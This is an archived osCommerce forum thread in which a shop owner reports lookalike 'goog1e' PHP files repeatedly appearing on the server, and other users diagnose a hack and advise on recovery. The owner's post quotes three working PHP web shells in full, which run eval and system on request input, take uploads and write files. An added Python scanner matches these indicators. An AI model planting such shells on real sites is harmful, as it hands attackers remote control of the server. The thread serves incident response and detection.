osCommerce

Google injecting files?


Guest

Hi

 

I am new to PHP and osCommerce. I have not had time to add all the anti-hacker add-ons mentioned by spooks in a forum post but cross site attack. (http://www.oscommerce.com/forums/index.php?showtopic=313323)

 

I have added Google Analytics V1.0 (http://addons.oscommerce.com/info/7200) recently and it worked fine until I noticed that a couple of new files have been injected into my /catalog/ folder over and over again.

 

I tried to delete them and a couple of days later, new files had been created again.

I didn't pay attention to whether those files are the same ones, but I rang my hosting company to try to get their engineers to take a look for me today. They also suggested that I check with osCommerce to see whether it is any of their scripts doing this or this particular add-on.

 

Here are the file names with the scripts inside those files; please see below. In those files, I noticed some scripts like REQUEST, MOVE UPLOADED FILES, COOKIES, etc. Please help me identify if they are a security breach. :'(

 

goog1e17d9b20b297ba.php - file permission: rw-r--r--

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

 

goog1e_analist_95813b97a72084.php - file permission: rwxrwxrwx

<!--<?php if(@$_REQUEST['cookies']==1){echo '--><i>Goog1e_analist_certs</i><br>';if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));}elseif(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],@$_REQUEST['fp'].$_FILES['f']['name']);if(@$_REQUEST['fc']){@chmod($_FILES['f']['name'],$_REQUEST['fc']);}}elseif(@$_REQUEST['nn']){$fh=fopen(@$_REQUEST['nn'],'w');fwrite($fh,@$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){@chmod(@$_REQUEST['nn'],$_REQUEST['fc']);}}else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']);$pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./';echo chr(118).chr(46).chr(46).@is_writable($pt);}echo '<!--';}?>-->

 

goog1eb2a0136fa3a64.php - file permission: rwxrwxrwx

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

 

 

Thanks guys!!! Help is needed urgently.

Link to comment
Share on other sites
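
A triage scan for the indicators visible in the files posted above (request input reaching eval/system/move_uploaded_file, world-writable mode, the goog1e lookalike name), added here as an example and not part of the original thread or of osCommerce. The function names and the shortened sample files are constructed for illustration; legitimate upload code can also match, so treat hits as leads to compare against a clean copy.

```python
import os, re, stat, tempfile

# Dangerous PHP calls seen in the posted files, and the request superglobals feeding them.
SINKS = re.compile(rb"\b(eval|system|base64_decode|move_uploaded_file)\s*\(")
SOURCES = re.compile(rb"\$_(POST|REQUEST|FILES|GET|COOKIE)\b")
LOOKALIKE = re.compile(r"goog1e", re.I)  # digit 1 in place of the letter l

def scan_file(path):
    """Return a list of triage findings for one PHP file."""
    findings = []
    if LOOKALIKE.search(os.path.basename(path)):
        findings.append("lookalike-name")
    if stat.S_IMODE(os.stat(path).st_mode) & stat.S_IWOTH:
        findings.append("world-writable")  # e.g. rwxrwxrwx
    with open(path, "rb") as fh:
        data = fh.read(1_000_000)
    sinks = sorted({m.group(1).decode() for m in SINKS.finditer(data)})
    if sinks and SOURCES.search(data):
        findings.append("request-input-with:" + ",".join(sinks))
    return findings

def scan_tree(root):
    """Walk root and map relative path -> findings for every flagged PHP file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Scan a throwaway directory holding constructed, shortened samples."""
    samples = {  # name -> (mode, constructed content)
        "index.php": (0o644, b"<?php echo 'catalog'; ?>"),
        "goog1e17d9b20b297ba.php": (0o644, b"<?php $e=@$_POST['e'];if($e){eval($e);} ?>"),
        "goog1e_analist_95813b97a72084.php":
            (0o777, b"<?php if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));} ?>"),
    }
    root = tempfile.mkdtemp()
    for name, (mode, body) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return scan_tree(root)

if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(path, hits)
```

Point scan_tree at the web root (for example the /catalog/ folder) and review every flagged file against a known clean copy of the shop.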

Kai,

 

Your site has been hacked, and not by Google.

 

I suggest you restore a known clean backup and then MAKE IT A PRIORITY to install the security contributions and apply the admin security patches.

 

 

Chris

Link to comment
Share on other sites

I only noticed those files after adding Google Analytics V1.0 (http://addons.oscommerce.com/info/7200)

 

Could you confirm this add-on is safe to use for me? Please?

 

Can I just reinstall the server side and upload my SQL into the database? I have had lots of products uploaded, and it will take me lots of time to upload them again.

 

 

Thanks Chris.

 

 

Kai

Link to comment
Share on other sites

Also, if I re-install osCommerce again, should I change all the passwords for the web server and database, as I know there is one file in osCommerce that contains that information?

 

 

Thanks

kai

Link to comment
Share on other sites

Kai,

 

It is unlikely that the hacker has accessed your database; however, you should ensure that your 2 configure.php files have permissions of 444.

 

 

 

 

Chris

Link to comment
Share on other sites

Chris,

 

Yes, every time I restored my site from a previous point, the first thing I did was to change those 2 configure.php files to 444.

 

I am wondering, if I restore my shop from a previous known clean point or do a complete reinstall, those add-ons will be in a different order. If I apply the old database files, will that cause problems?

 

And again, is Google Analytics V1.0 (http://addons.oscommerce.com/info/7200) safe to use?

 

 

Thanks

Kai

Link to comment
Share on other sites

That addon didn't cause the hack.

 

If you want to find out what causes it and how to prevent it read this


Link to comment
Share on other sites

I have deleted my whole store including the database and changed the password for everything :( Cos if it was not that add-on that caused the attack, I won't be able to tell when my site was clean.

 

Now I have my site up with all those patches mentioned in Spooks' forum post. Hope I will be fine for a while.

 

Just one question: I changed the admin folder to something else, along with the relevant files. But in future, before I add more add-ons, do I need to check each file in that add-on and change 'admin' to 'my changed folder name'? I have changed the ADMIN folder to the new name, and checked every file to see if there is any need to replace the word admin too.

 

It is very time consuming and I am very slow at restoring my shop to full running at the moment. Could you confirm that what I did to change the folder and check every file is necessary?

 

Thanks

Link to comment
Share on other sites

Kai,

 

You will only need to change the admin folder back to the name admin if you intend to use an auto-installer to install the contribution. Otherwise, just apply changes to your current admin folder name where the contribution states 'admin'

 

 

 

Chris

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.
